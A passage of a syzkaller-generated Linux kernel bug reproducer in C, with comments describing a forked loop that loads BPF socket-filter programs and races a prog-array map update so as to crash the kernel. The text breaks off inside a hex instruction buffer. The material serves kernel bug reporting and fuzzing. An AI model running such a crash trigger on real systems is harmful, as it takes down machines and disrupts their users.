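// https://syzkaller.appspot.com/bug?id=d5f63be97bcf572595613d19f9b82475e37c9026
// autogenerated by syzkaller (https://github.com/google/syzkaller)
//
// Kernel bug reproducer. Structure:
//   main()          – maps a fixed RWX scratch region at 0x20000000 (every
//                     syscall argument below is poked into it by address),
//                     enters a scratch directory, then loop()s forever;
//   loop()          – per iteration forks a child that runs the 6-call
//                     program once, kills it after 5 s if needed, cleans up;
//   execute_one()   – dispatches the calls onto worker threads;
//   execute_call()  – the program itself: an AF_UNIX socketpair, a
//                     BPF_MAP_TYPE_PROG_ARRAY map, two socket-filter
//                     programs (the second tail-calls through the map), and
//                     SO_ATTACH_BPF of the second program onto the socket.
// Run it only on a disposable machine/VM: it is meant to crash the kernel.
//
// The header names were lost when this file was extracted (the page shows
// bare "#include" tokens). The list below is restored from the names the
// program uses and is the usual syzkaller prelude; review against the
// original if in doubt.

#define _GNU_SOURCE

#include <dirent.h>
#include <errno.h>
#include <fcntl.h>
#include <pthread.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/mount.h>
#include <sys/prctl.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

#include <linux/futex.h>

#ifndef __NR_bpf
#define __NR_bpf 321
#endif

// Sleep for ms milliseconds.
static void sleep_ms(uint64_t ms)
{
  usleep(ms * 1000);
}

// Monotonic clock in milliseconds. The reproducer cannot enforce its
// timeouts without it, so a failing clock_gettime() is fatal.
static uint64_t current_time_ms(void)
{
  struct timespec ts;
  if (clock_gettime(CLOCK_MONOTONIC, &ts)) {
    exit(1);
  }
  return (uint64_t)ts.tv_sec * 1000 + (uint64_t)ts.tv_nsec / 1000000;
}

// Create a scratch directory under the cwd and chdir into it. Note that the
// directory is made world-writable (0777): run the reproducer from a
// location where that is acceptable.
static void use_temporary_dir(void)
{
  char tmpdir_template[] = "./syzkaller.XXXXXX";
  char* tmpdir = mkdtemp(tmpdir_template);
  if (!tmpdir) {
    exit(1);
  }
  if (chmod(tmpdir, 0777)) {
    exit(1);
  }
  if (chdir(tmpdir)) {
    exit(1);
  }
}

// Start a worker thread (128 KiB stack, never joined). EAGAIN — typically a
// thread-count limit — is retried up to 100 times; any other failure aborts.
static void thread_start(void* (*fn)(void*), void* arg)
{
  pthread_t th;
  pthread_attr_t attr;
  pthread_attr_init(&attr);
  pthread_attr_setstacksize(&attr, 128 << 10);
  for (int attempt = 0; attempt < 100; attempt++) {
    if (pthread_create(&th, &attr, fn, arg) == 0) {
      pthread_attr_destroy(&attr);
      return;
    }
    if (errno == EAGAIN) {
      usleep(50);
      continue;
    }
    break;
  }
  exit(1);
}

// Minimal one-shot event on a futex word, used for the ready/done
// handshake between execute_one() and its worker threads.
typedef struct {
  int state;
} event_t;

static void event_init(event_t* ev)
{
  ev->state = 0;
}

static void event_reset(event_t* ev)
{
  ev->state = 0;
}

// Set the event and wake every waiter. Setting an already-set event is a
// protocol violation and aborts the process.
static void event_set(event_t* ev)
{
  if (ev->state) {
    exit(1);
  }
  __atomic_store_n(&ev->state, 1, __ATOMIC_RELEASE);
  syscall(SYS_futex, &ev->state, FUTEX_WAKE | FUTEX_PRIVATE_FLAG, 1000000);
}

// Block until the event is set.
static void event_wait(event_t* ev)
{
  while (!__atomic_load_n(&ev->state, __ATOMIC_ACQUIRE)) {
    syscall(SYS_futex, &ev->state, FUTEX_WAIT | FUTEX_PRIVATE_FLAG, 0, 0);
  }
}

static int event_isset(event_t* ev)
{
  return __atomic_load_n(&ev->state, __ATOMIC_ACQUIRE);
}

// Wait up to timeout ms for the event. Returns 1 if it was set, 0 on
// timeout. A spurious futex wakeup simply re-enters the loop with the
// remaining time; `remain` cannot underflow because the loop exits as soon
// as now - start exceeds timeout.
static int event_timedwait(event_t* ev, uint64_t timeout)
{
  uint64_t start = current_time_ms();
  uint64_t now = start;
  for (;;) {
    uint64_t remain = timeout - (now - start);
    struct timespec ts;
    ts.tv_sec = remain / 1000;
    ts.tv_nsec = (remain % 1000) * 1000 * 1000;
    syscall(SYS_futex, &ev->state, FUTEX_WAIT | FUTEX_PRIVATE_FLAG, 0, &ts);
    if (__atomic_load_n(&ev->state, __ATOMIC_ACQUIRE)) {
      return 1;
    }
    now = current_time_ms();
    if (now - start > timeout) {
      return 0;
    }
  }
}

// printf-style write of a string (truncated to 1023 bytes) to an existing
// file. Returns false on failure; errno is preserved from the failing
// write() across the close().
static bool write_file(const char* file, const char* what, ...)
{
  char buf[1024];
  va_list args;
  va_start(args, what);
  vsnprintf(buf, sizeof(buf), what, args);
  va_end(args);
  buf[sizeof(buf) - 1] = 0;
  int len = strlen(buf);
  int fd = open(file, O_WRONLY | O_CLOEXEC);
  if (fd == -1) {
    return false;
  }
  if (write(fd, buf, len) != len) {
    int err = errno;
    close(fd);
    errno = err;
    return false;
  }
  close(fd);
  return true;
}

#define FS_IOC_SETFLAGS _IOW('f', 2, long)

// Recursively delete dir (the per-iteration work directory). The test child
// may have left mounts, immutable/append-only files or busy entries behind,
// so every step unmounts first, clears inode flags on EPERM and retries on
// EBUSY/ENOTEMPTY; read-only filesystems are skipped and anything else is
// fatal. Note that errno is read after open()/ioctl()/close() in the EPERM
// branches, so those later checks see whichever call failed last — kept
// as generated.
static void remove_dir(const char* dir)
{
  int iter = 0;
  DIR* dp = 0;
  const int umount_flags = MNT_FORCE | UMOUNT_NOFOLLOW;
retry:
  while (umount2(dir, umount_flags) == 0) {
  }
  dp = opendir(dir);
  if (dp == NULL) {
    // The generated code distinguished EMFILE here but exited either way.
    exit(1);
  }
  struct dirent* ep = 0;
  while ((ep = readdir(dp))) {
    if (strcmp(ep->d_name, ".") == 0 || strcmp(ep->d_name, "..") == 0) {
      continue;
    }
    char filename[FILENAME_MAX];
    snprintf(filename, sizeof(filename), "%s/%s", dir, ep->d_name);
    while (umount2(filename, umount_flags) == 0) {
    }
    struct stat st;
    if (lstat(filename, &st)) {
      exit(1);
    }
    if (S_ISDIR(st.st_mode)) {
      remove_dir(filename);
      continue;
    }
    for (int i = 0;; i++) {
      if (unlink(filename) == 0) {
        break;
      }
      if (errno == EPERM) {
        // Probably an immutable/append-only inode: clear its flags, retry.
        int fd = open(filename, O_RDONLY);
        if (fd != -1) {
          long flags = 0;
          if (ioctl(fd, FS_IOC_SETFLAGS, &flags) == 0) {
          }
          close(fd);
          continue;
        }
      }
      if (errno == EROFS) {
        break;
      }
      if (errno != EBUSY || i > 100) {
        exit(1);
      }
      if (umount2(filename, umount_flags)) {
        exit(1);
      }
    }
  }
  closedir(dp);
  for (int i = 0;; i++) {
    if (rmdir(dir) == 0) {
      break;
    }
    if (i < 100) {
      if (errno == EPERM) {
        int fd = open(dir, O_RDONLY);
        if (fd != -1) {
          long flags = 0;
          if (ioctl(fd, FS_IOC_SETFLAGS, &flags) == 0) {
          }
          close(fd);
          continue;
        }
      }
      if (errno == EROFS) {
        break;
      }
      if (errno == EBUSY) {
        if (umount2(dir, umount_flags)) {
          exit(1);
        }
        continue;
      }
      if (errno == ENOTEMPTY) {
        // Something reappeared (e.g. a mount was exposed); rescan, bounded.
        if (iter < 100) {
          iter++;
          goto retry;
        }
      }
    }
    exit(1);
  }
}

// SIGKILL the test process group and reap pid. If it has not died within
// ~100 ms (e.g. it is blocked in a FUSE request), abort every FUSE
// connection through sysfs and then wait without a timeout.
static void kill_and_wait(int pid, int* status)
{
  kill(-pid, SIGKILL);
  kill(pid, SIGKILL);
  for (int i = 0; i < 100; i++) {
    if (waitpid(-1, status, WNOHANG | __WALL) == pid) {
      return;
    }
    usleep(1000);
  }
  DIR* dir = opendir("/sys/fs/fuse/connections");
  if (dir) {
    for (;;) {
      struct dirent* ent = readdir(dir);
      if (!ent) {
        break;
      }
      if (strcmp(ent->d_name, ".") == 0 || strcmp(ent->d_name, "..") == 0) {
        continue;
      }
      char abort[300];
      snprintf(abort, sizeof(abort), "/sys/fs/fuse/connections/%s/abort", ent->d_name);
      int fd = open(abort, O_WRONLY);
      if (fd == -1) {
        continue;
      }
      // The abort file acts on any write; the first byte of the path
      // buffer is simply a convenient byte to send.
      if (write(fd, abort, 1) < 0) {
      }
      close(fd);
    }
    closedir(dir);
  }
  while (waitpid(-1, status, __WALL) != pid) {
  }
}

// Per-child setup: die with the parent, own process group, make this
// process the OOM killer's preferred victim, and provide a ./binderfs
// symlink (failure to create it is ignored; unused by this program).
static void setup_test(void)
{
  prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0);
  setpgrp();
  write_file("/proc/self/oom_score_adj", "1000");
  if (symlink("/dev/binderfs", "./binderfs")) {
  }
}

struct thread_t {
  int created, call;
  event_t ready, done;
};

static struct thread_t threads[16];
static void execute_call(int call);
static int running;  // number of calls currently executing on workers

// Worker thread: wait for a call assignment, run it, signal done. Never
// returns; the process exits via exit() elsewhere.
static void* thr(void* arg)
{
  struct thread_t* th = (struct thread_t*)arg;
  for (;;) {
    event_wait(&th->ready);
    event_reset(&th->ready);
    execute_call(th->call);
    __atomic_fetch_sub(&running, 1, __ATOMIC_RELAXED);
    event_set(&th->done);
  }
  return 0;
}

// Run the 6 calls of the program, each on the first idle worker thread
// (workers are created lazily). Each call is normally awaited for up to
// 50 ms before the next is issued; call 3 (the map update) is issued
// without waiting, so it can overlap with call 4 (the second program load)
// on another thread — presumably the timing the reproducer relies on.
// Finally wait up to ~100 ms for stragglers.
static void execute_one(void)
{
  if (write(1, "executing program\n", sizeof("executing program\n") - 1)) {
  }
  const int nthreads = (int)(sizeof(threads) / sizeof(threads[0]));
  for (int call = 0; call < 6; call++) {
    for (int thread = 0; thread < nthreads; thread++) {
      struct thread_t* th = &threads[thread];
      if (!th->created) {
        th->created = 1;
        event_init(&th->ready);
        event_init(&th->done);
        event_set(&th->done);
        thread_start(thr, th);
      }
      if (!event_isset(&th->done)) {
        continue;  // worker busy; try the next one
      }
      event_reset(&th->done);
      th->call = call;
      __atomic_fetch_add(&running, 1, __ATOMIC_RELAXED);
      event_set(&th->ready);
      if (call == 3) {
        break;
      }
      event_timedwait(&th->done, 50);
      break;
    }
  }
  for (int i = 0; i < 100 && __atomic_load_n(&running, __ATOMIC_RELAXED); i++) {
    sleep_ms(1);
  }
}

#define WAIT_FLAGS __WALL

// Forever: fork a child into a fresh ./N directory, let it run the program
// once, kill it if it is still alive after 5 s, then delete the directory.
static void loop(void)
{
  int iter = 0;
  for (;; iter++) {
    char cwdbuf[32];
    sprintf(cwdbuf, "./%d", iter);
    if (mkdir(cwdbuf, 0777)) {
      exit(1);
    }
    int pid = fork();
    if (pid < 0) {
      exit(1);
    }
    if (pid == 0) {
      if (chdir(cwdbuf)) {
        exit(1);
      }
      setup_test();
      execute_one();
      exit(0);
    }
    int status = 0;
    uint64_t start = current_time_ms();
    for (;;) {
      sleep_ms(10);
      if (waitpid(-1, &status, WNOHANG | WAIT_FLAGS) == pid) {
        break;
      }
      if (current_time_ms() - start < 5000) {
        continue;
      }
      kill_and_wait(pid, &status);
      break;
    }
    remove_dir(cwdbuf);
  }
}

// Results passed between calls (-1 = not yet assigned):
//   r[0] socket fd (first end of the socketpair)
//   r[1] prog-array map fd
//   r[2] first BPF program fd
//   r[3] second BPF program fd
uint64_t r[4] = {0xffffffffffffffff, 0xffffffffffffffff, 0xffffffffffffffff, 0xffffffffffffffff};

// Execute call number `call` of the program. All argument structures are
// written by absolute address into the RWX region mapped at 0x20000000 by
// main(); field offsets follow union bpf_attr (verify against the kernel
// header in use if exact fields matter). Results are stored in r[].
void execute_call(int call)
{
  intptr_t res = 0;
  switch (call) {
  case 0:
    // socketpair(AF_UNIX, SOCK_SEQPACKET, 0, fds@0x20000040); r[0] = fds[0].
    res = syscall(__NR_socketpair, /*domain=*/1ul, /*type=SOCK_SEQPACKET*/ 5ul, /*proto=*/0, /*fds=*/0x20000040ul);
    if (res != -1) {
      r[0] = *(uint32_t*)0x20000040;
    }
    break;
  case 1:
    // bpf(BPF_MAP_CREATE): map_type 3 (BPF_MAP_TYPE_PROG_ARRAY), key_size 4,
    // value_size 4, max_entries 10, no name, btf_fd -1; r[1] = map fd.
    *(uint32_t*)0x20000740 = 3;
    *(uint32_t*)0x20000744 = 4;
    *(uint32_t*)0x20000748 = 4;
    *(uint32_t*)0x2000074c = 0xa;
    *(uint32_t*)0x20000750 = 0;
    *(uint32_t*)0x20000754 = 0;
    *(uint32_t*)0x20000758 = 0;
    memset((void*)0x2000075c, 0, 16);
    *(uint32_t*)0x2000076c = 0;
    *(uint32_t*)0x20000770 = -1;
    *(uint32_t*)0x20000774 = 0;
    *(uint32_t*)0x20000778 = 0;
    *(uint32_t*)0x2000077c = 0;
    *(uint64_t*)0x20000780 = 0;
    *(uint32_t*)0x20000788 = 0;
    *(uint32_t*)0x2000078c = 0;
    res = syscall(__NR_bpf, /*cmd=*/0ul, /*arg=*/0x20000740ul, /*size=*/0x50ul);
    if (res != -1) {
      r[1] = res;
    }
    break;
  case 2:
    // bpf(BPF_PROG_LOAD): prog_type 1 (socket filter), insn_cnt 5,
    // insns @0x20000540, license "GPL". With insn_cnt 5 only the first
    // 40 bytes of the 3441-byte buffer are instructions; the remainder is
    // generator filler that this call does not consume (inferred from
    // insn_cnt). The attr size passed is 0x48, so the stores from
    // 0x200000c8 onward lie beyond the attr the kernel reads for this call.
    *(uint32_t*)0x20000080 = 1;
    *(uint32_t*)0x20000084 = 5;
    *(uint64_t*)0x20000088 = 0x20000540;
    memcpy(
        (void*)0x20000540,
        "\xbf\x16\x00\x00\x00\x00\x00\x00\xb7\x07\x00\x00\x00\x01\x00\x00\x48"
        "\x70\x00\x00\x00\x00\x00\x00\x35\x00\x00\x00\x00\x00\x00\x00\x95\x00"
        "\x00\x00\x00\x00\x00\x00\x2b\xa7\x28\x04\x15\x98\xfb\xd3\x0c\xb5\x99"
        "\xe8\x3d\x24\xa3\xaa\x81\xd3\x6b\xb3\x01\x9c\x13\xbd\x23\x21\x2f\xb5"
        "\x6f\xa5\x4f\x26\x41\xd8\xb0\x2c\x38\x15\xe7\x9c\x14\x14\xeb\x07\xea"
        "\xe6\xf0\x71\x1e\x6b\xd9\x17\x48\x79\x60\x71\x71\x42\xda\x76\x46\xc4"
        "\xfe\x02\x99\x6b\x60\xcf\x81\xeb\xcd\x50\xfa\x9e\xa4\x31\x81\x23\xf6"
        "\x02\x00\x00\x00\x00\x00\x00\xde\x89\xe6\x61\x16\x8c\x18\x86\xd0\xd4"
        "\xd9\x4f\x20\x4e\x34\x5c\x65\x2f\xbc\x16\x26\xe3\xa2\xa2\xad\x35\x80"
        "\x61\xd0\xae\x02\x09\xe6\x2f\x51\xee\x98\x8e\x6e\xa6\x04\xce\x97\x4a"
        "\x22\xa5\x50\xd6\xf9\x70\x80\x98\x04\x00\x00\x3e\x05\xdf\x3c\xeb\x9f"
        "\x1f\xea\xe5\x73\x7e\xca\xa8\x0a\x66\x69\x63\xc4\x74\xc2\xa1\x00\xc7"
        "\x88\xb2\x77\xbe\xee\x1c\xbf\x9b\x0a\x4d\x38\x81\xdc\xc7\xb1\xb8\x5f"
        "\x3c\x3d\x44\xae\xac\xcd\x36\x41\x11\x0b\xec\x4e\x90\xa6\x34\x19\x65"
        "\xc3\x9e\x4b\x34\x31\xab\xe8\x02\xf5\xab\x3e\x89\xcf\x6c\x66\x2e\xd4"
        "\x04\x8d\x3b\x3e\x22\x27\x8d\x00\xce\x00\x00\x00\x00\xd3\xa0\x27\x62"
        "\xc2\x95\x12\x57\xb8\x58\x02\x18\x9d\x74\x00\x5d\x2a\x1b\xcf\x94\x36"
        "\xe1\x92\xe2\x3f\xd2\x75\x98\x5b\xf3\x1b\x71\x4f\x00\x0b\xca\xb6\xfc"
        "\xd6\x10\xf2\x5f\x58\x88\x00\x00\x00\x00\x3f\x11\xaf\xc9\xbd\x08\xc6"
        "\xeb\xfb\xb8\x94\x32\xfb\x46\x5b\xc5\x2f\x49\x12\x9b\x9b\x61\x50\xe3"
        "\x20\xc9\x90\x1d\xe2\xeb\xb9\x00\x00\x00\x01\x8e\x30\x95\xc4\xc5\xc7"
        "\xa1\x56\xce\xc3\x3a\x66\x7d\xcc\xaf\xf9\x50\xca\x1e\x5e\xfd\xd4\xc9"
        "\x68\xda\xcf\x81\xba\xa3\xa5\x09\xb1\x04\x1d\x06\xf6\xb0\x09\x7c\x43"
        "\x04\x81\x82\x4a\x3f\x4f\xdd\xd3\xc6\x43\xf6\x30\xba\x17\x5d\x87\x6d"
        "\xef\xd3\x54\x17\x72\xf2\x6e\x27\xc4\x4c\xfd\xb2\xd8\x5d\x6d\x29\x98"
        "\x3e\x83\x0a\x9c\xdd\x79\x83\x7b\x34\x68\xe8\xc6\x7a\x57\x1d\x0a\x01"
        "\x7c\x10\x03\x44\xc5\x2a\x6f\x38\x7a\x13\x40\xa1\xc8\x88\x94\x64\xf9"
        "\x0c\xc4\xcd\x1f\x57\x0d\xd3\x98\x77\xdf\xb2\xff\x1a\xe6\x6e\x1c\xe9"
        "\x17\x47\x4b\x2e\x65\x0a\xe6\x30\xaf\xd0\x14\xa3\x37\xac\x5d\x58\xbc"
        "\xb5\xe5\x17\x23\x25\x7c\x87\x2c\x52\x55\xf2\x01\x00\x00\x00\x00\x00"
        "\x00\x00\xf0\x41\xb6\x65\xab\x21\x37\x2c\x8d\x8b\x7b\xac\x5b\x5c\x78"
        "\x4d\x20\xa4\xa2\x4d\x8d\xbd\x75\x06\x2e\x1d\xae\xf9\xde\xad\x61\x9c"
        "\xc6\xe7\xba\xa7\x27\x07\x15\x77\x91\xc3\xd2\xa2\x86\xff\xb8\xd3\x54"
        "\x52\xbb\x5d\x36\xc2\xa8\x68\x2b\xf7\xec\xbd\x53\xf9\x50\xef\x47\x09"
        "\xec\x01\xe2\x30\xd2\xf5\x35\x94\xef\x48\x39\xc6\x13\x0c\x4c\x13\xa0"
        "\xcc\xa8\x4b\x99\x35\xf7\x71\xfd\x49\xe4\x80\xcd\x9d\x48\xae\xb1\x2b"
        "\x1d\x25\x5b\xe1\xed\x66\xd9\x05\x1f\x22\x61\x4d\x1f\x62\x73\x4d\x67"
        "\x90\x39\xa9\x7d\x2b\x74\xf9\xe8\xe9\x97\xcc\xd3\x14\x00\x0f\x74\x7f"
        "\x4e\x8e\x70\x25\x12\x3e\x78\x3d\xf8\xb8\xa1\x7e\x3a\xa9\xfe\x1f\x66"
        "\x2a\xef\x87\xa0\x65\xb0\x3c\xfb\x65\xb4\xdf\xe4\xf1\xb5\x6e\x1f\x23"
        "\x12\x8d\x74\x37\x53\xa1\xde\x17\x2d\x68\x3d\x58\x92\xce\x94\x14\xa1"
        "\xd9\x8e\xa9\x3e\x3d\x35\xdb\xb6\xc2\x3b\x90\xcf\x36\xe8\x3b\x8a\x43"
        "\x4a\x97\xd0\x93\x43\xd7\xf8\x30\x79\xcc\xb0\x2e\x69\xd3\x84\x14\x60"
        "\x56\xd1\x25\xcf\xa7\x88\x23\x78\x74\xdd\x42\xda\xe3\x34\xbd\xa0\x42"
        "\x81\x9a\x2a\xa2\x4d\xba\x1c\x25\xbe\x27\x94\x44\x8b\x4f\x63\x48\x30"
        "\x26\xb5\xe3\x4d\x44\x70\x5b\x76\xef\x29\x24\x1a\xda\xb0\xdd\x7d\x68"
        "\xbf\x97\x5e\x02\x06\x9f\x6f\x24\x25\xe1\xbc\x97\xa3\xd5\x88\x08\x5f"
        "\x16\xbe\xf6\x3a\x06\x57\x8d\x4f\x5d\xe7\xbf\xb6\xaa\xa7\x5f\x16\x99"
        "\x6d\x53\x62\x56\xc0\x22\x84\xcb\x1d\x3a\x6f\xb8\xca\xe8\x76\x91\xfa"
        "\xe3\x65\xa7\x0c\x3f\xc6\x9e\x15\x65\xbb\xa8\xdd\x8a\x8c\xa0\x49\xf7"
        "\x98\xab\xe6\x46\xf7\x38\xbe\xbd\x69\x41\x3a\xfc\x9d\x8a\x5e\xdd\x7a"
        "\xaa\x00\x00\x00\x00\x00\x00\x00\x1e\x6c\x2f\x2a\x28\x7c\x52\x78\xa2"
        "\x18\xdb\xfa\xff\xff\xff\x00\xa1\x4d\xb5\xcf\xa6\x81\x9e\xb1\xd3\x9c"
        "\x48\xcf\xdc\x80\xd2\x15\xc9\xe1\x6e\x0c\x47\x36\xc8\x19\x36\x31\x54"
        "\xcc\xa4\xe2\xf8\x98\x00\xd1\x8c\x89\xd7\xf4\x6f\x67\x9d\xf6\xc9\xe2"
        "\x95\x2a\xe1\xeb\xfd\x0c\xa8\x83\x68\xee\x6c\xe1\x39\xe8\xb5\x82\x2c"
        "\x22\xcf\x2e\x9d\xde\x94\x3d\x34\xc4\x32\xe1\x00\x11\x71\x79\x2c\x65"
        "\x98\x61\x46\x66\x6a\x54\x90\x92\x84\x41\xf4\x7e\x0f\xe5\xea\xc4\x18"
        "\x24\xca\x1f\xd0\xeb\x71\xaa\x24\x3c\x88\xd5\x48\x0e\x5a\xee\x9c\x9e"
        "\x5f\x2e\x5a\x56\xa6\xd9\x20\x33\x5c\x8e\x87\x26\xfd\x83\x29\xd9\xa7"
        "\x28\x99\x5b\x15\x31\xbd\x20\x36\x0d\x33\xd8\xf9\xff\xff\xff\x5f\x91"
        "\x2a\xc4\xe3\x4b\xf6\xea\x8a\x86\xda\x70\x7b\x03\xbd\xdb\x49\x1b\xa0"
        "\xcc\x98\xf6\xbe\x92\xc5\x59\x69\xa2\xb5\x00\x25\x41\x9d\x14\x76\xc7"
        "\x31\x32\xca\x7c\xa2\x6c\xe8\xa7\xe3\xff\xb7\x00\xf0\x9e\x15\x7f\x9b"
        "\x84\x40\x51\xf1\xa6\x42\xac\xa9\xff\x98\xc9\x03\x64\x71\xcc\xff\x05"
        "\x22\x90\x3e\x7b\xcf\x62\xe1\x8f\x76\x96\xbb\xc2\x80\xb9\x5e\x8e\x0d"
        "\x6f\xd5\x64\x4b\x0e\xbd\xe3\xa9\x5b\x06\x54\x88\x62\xde\x80\x9d\x3d"
        "\xae\x3c\xcc\xf1\x09\xf7\xc7\x8e\x84\x79\xa3\x45\xe8\x00\x00\x00\x00"
        "\x00\x00\x00\x00\x00\x00\x00\x94\x55\xbf\x41\x76\x27\xce\x72\x3a\x5d"
        "\x91\x03\x70\x6a\xba\x69\x27\x95\x00\xbb\x82\xf6\xb5\xa3\xdd\xc0\xbd"
        "\x98\x56\x71\x29\x45\xb7\x0c\x75\xce\x5b\x72\x25\x78\x82\x08\x20\xd0"
        "\x10\xd7\xa3\xcf\xfc\x99\xfc\x64\x7d\x0b\x82\xef\x26\xab\x70\x8c\x0b"
        "\x19\xed\x14\x4b\xe5\x1c\x3b\x39\x8f\x0e\x6b\xb7\xa3\x00\x06\x00\x00"
        "\x00\xcb\xa1\x29\x53\xd5\x8c\xff\x0f\x03\x78\x74\x0f\xe6\x66\x2f\x37"
        "\x7b\x97\xd8\xe7\xcd\xb0\x47\x05\x0d\x72\x96\xcd\x38\x56\x47\x6a\x60"
        "\xa4\x9a\xd1\x27\xba\x65\x70\xba\xfc\x2b\xbc\xf9\xee\x72\x1f\xd9\xcb"
        "\x46\x7f\xf0\x71\xe5\x60\x4f\xbf\x04\x91\x24\x5c\x00\x00\x00\x7d\x93"
        "\x2d\x7a\x64\xde\x4c\x4a\xa4\x33\xfc\x08\x40\xaf\xf7\xc4\x7d\xa3\xa4"
        "\xc6\x96\x6d\x00\x00\x00\x00\x00\x00\x00\x00\xf6\xbf\xba\xe2\x9e\x8a"
        "\x6e\x2a\x88\x9f\x6e\xf6\x86\x9d\x82\xd6\xbd\x73\xeb\x76\xb6\x5c\x7a"
        "\x35\xa5\x4a\x4a\x6b\x8a\xd4\x60\x0e\x3a\x97\x2a\x0b\xb5\x97\x1a\x5f"
        "\x16\x59\x0b\x0a\x03\xda\xfa\x3f\xd1\x11\x87\x65\xcc\x8a\xb9\xfc\xcf"
        "\x3b\x51\xc4\x1a\x33\x9f\x20\x0f\x2f\xa3\x30\x06\x91\x0a\x67\x9a\x9a"
        "\xe0\x18\x7b\x4d\x75\x0c\x4b\xd2\x44\xcb\x0c\xbf\xd2\x3b\x26\x5f\x4d"
        "\x4d\xa4\x48\xa7\xa0\xd1\x9c\x5e\x43\xea\xe5\x0a\x31\x60\x9d\xfa\x2d"
        "\xde\x26\x75\x51\x46\x7e\xb6\x47\x52\x93\xdd\x70\x12\xcc\x44\x90\x09"
        "\x98\x1f\x22\x82\x0e\x57\xa0\xef\xf2\x34\xcc\xfe\x21\xd7\xa2\x30\x2e"
        "\x00\x06\x69\x75\x3d\x3c\x34\x32\xcc\x14\xee\x1a\xbe\x72\x4a\xdb\x6b"
        "\x54\x31\xbe\xfe\xdd\x3e\x22\x97\x11\x18\xf0\xe2\x1a\xed\x03\xa6\xfe"
        "\x78\x60\xb3\xe1\x3c\x31\x73\xa6\x0a\x18\x23\xcb\x7d\xde\x82\x12\xa8"
        "\x53\x1b\xd9\x69\x1d\xd4\xcc\x6a\x37\x0e\x9e\xb5\x6b\x3d\x79\x0b\x98"
        "\xf2\xbd\x0d\xb1\xe5\xde\x6a\x14\x65\x97\xb2\xcb\xb7\x10\x30\x40\xd2"
        "\xa3\x9d\x79\x65\xd3\x4d\xf5\x24\xb7\x60\xab\x92\xef\xcc\xe7\xdd\x15"
        "\x74\x05\x2c\x73\x59\x35\xbf\x6a\x75\x2c\x01\x5c\x7f\x5f\xfe\xe9\xff"
        "\x66\xe5\xdd\x28\x66\xb1\x5b\x6e\x0d\x17\x61\x8c\xb1\xf5\xc1\xee\x4b"
        "\x05\xeb\xf1\x44\x5e\xa1\x10\xf4\x99\xf8\x40\xa5\xc9\x65\x44\x3d\x72"
        "\x55\x56\x35\x1e\xe2\x5f\xe0\x9f\x69\x49\x4b\x05\x36\x78\xdc\xad\xcf"
        "\x02\xe0\x63\xdf\xf2\xfa\x4b\xef\x1a\xc3\xbb\xbe\xbe\x6c\x74\xd7\x1e"
        "\xc3\xb2\x3e\x29\x89\x5e\xff\x1d\x10\x17\x02\x4f\xe3\xe8\xcc\x75\x9b"
        "\x05\x78\x5a\xdc\x34\x6b\x7f\xfd\x05\x96\x3f\x92\xc1\xd0\xd7\xd9\x0b"
        "\xa8\x78\xad\x89\xe4\x90\xf3\xe2\x9a\xc5\x1d\x30\x63\x28\x69\xa5\x34"
        "\x41\x8f\x91\x6b\xf6\xfe\x81\x67\x82\x7a\x8e\x6c\x8f\x8b\x39\x1c\x82"
        "\x28\x05\xcb\x0a\xdf\x1b\x8b\xd6\x94\x7f\xf2\x08\x75\x3e\xb0\xd2\x08"
        "\xce\x14\xf7\xb2\x06\xb2\xe0\x2c\x21\xe9\x63\xab\xc5\xce\xb7\x35\xc1"
        "\xb3\xc4\x6b\x0a\x84\x3d\xe5\x2a\x00\x00\x00\x00\x00\x00\x00\x01\xee"
        "\x9c\x2b\x27\x05\xc1\xa8\x1d\x9d\x3b\x96\x56\xb2\x19\xc8\xcd\x99\xc9"
        "\xca\xfc\xd0\xd0\x54\x08\x84\xd9\x7a\xec\xb1\x99\x83\xfc\x6a\xf2\x9a"
        "\xb4\x4a\x82\xaf\xf9\xcb\xa9\x21\x19\x2c\x66\x5b\x87\x7a\xf6\x53\x9b"
        "\xdb\x1b\x56\x7f\x48\x1b\xa0\x79\x82\xe7\xad\x75\x8f\x4e\x1e\xac\x69"
        "\xe7\xe8\x8a\x63\x96\x09\x75\xf4\x90\xe1\x61\xe3\x71\xec\x85\x34\x79"
        "\x1e\x3b\x61\xc6\x85\xd9\x00\xa9\xc0\x83\x92\x08\x35\x6b\x53\x75\x0e"
        "\x76\xfc\xc3\xc2\xd1\xbd\xdc\xbd\x83\x89\x79\x21\x41\x4d\x0c\x02\xe8"
        "\x18\x8f\x3d\xf7\x9e\xa2\xa5\xc5\x44\x40\x04\x83\x0e\x6c\xb2\x27\xca"
        "\x1b\xda\xfb\x97\x7c\x00\x00\x00\x00\x00\x3a\x41\x71\x93\xb8\xc5\xd7"
        "\x93\x68\x73\x35\xa9\x30\x86\x70\x94\xfd\x6a\x78\x21\x82\x18\xe0\x4b"
        "\x70\x5e\xc6\x2f\x16\x08\xcb\x56\x9b\x81\x91\x4e\x68\xf1\x75\xb3\x92"
        "\xaf\x6b\xc4\xfd\x21\x21\xd7\xfd\x27\x6a\xf2\xc9\x7a\x44\x1b\x56\xe7"
        "\xa0\x68\x7d\x98\xb8\xe7\x6d\x8d\x0d\x23\x1e\x4f\xe0\x0b\xe1\xde\x76"
        "\xbd\x19\xcc\x12\xe2\xbd\x93\x8e\xb6\x81\xed\x6b\xc9\x51\xc1\xb4\xf7"
        "\xc5\x1a\xf5\x9e\xea\x4d\x40\xc6\x00\x00\x00\x00\x02\x00\x77\x8a\x67"
        "\x7b\x72\x78\x63\x11\x15\x32\x71\xa3\x31\x3d\xa0\x26\x45\xe1\x17\x61"
        "\x69\x9e\x4d\x04\xac\x86\xdd\x14\xff\x7b\x9a\x10\xd3\xfa\x74\x69\x6f"
        "\xe3\x95\x3a\x5b\x77\x06\xbf\x5d\x1f\xab\xa4\xb1\x88\x08\xd9\xcb\x0e"
        "\x9d\xb6\x96\xde\xc4\xe0\x82\x0e\xe4\x02\x8d\x72\x25\xa2\xc9\xc4\x27"
        "\xcf\x64\xcb\xde\x6f\xba\x05\x6b\x20\x06\xb7\xa3\x7c\x11\x81\xd5\x30"
        "\xfb\x86\x5e\x23\x5c\xd3\x02\xf3\xb4\x07\x1e\xe5\x23\x7a\xda\x18\x6b"
        "\x9e\x5e\x31\x44\xbf\x47\x9f\x27\x7f\x10\x65\x6a\xd3\x74\x40\x37\xcc"
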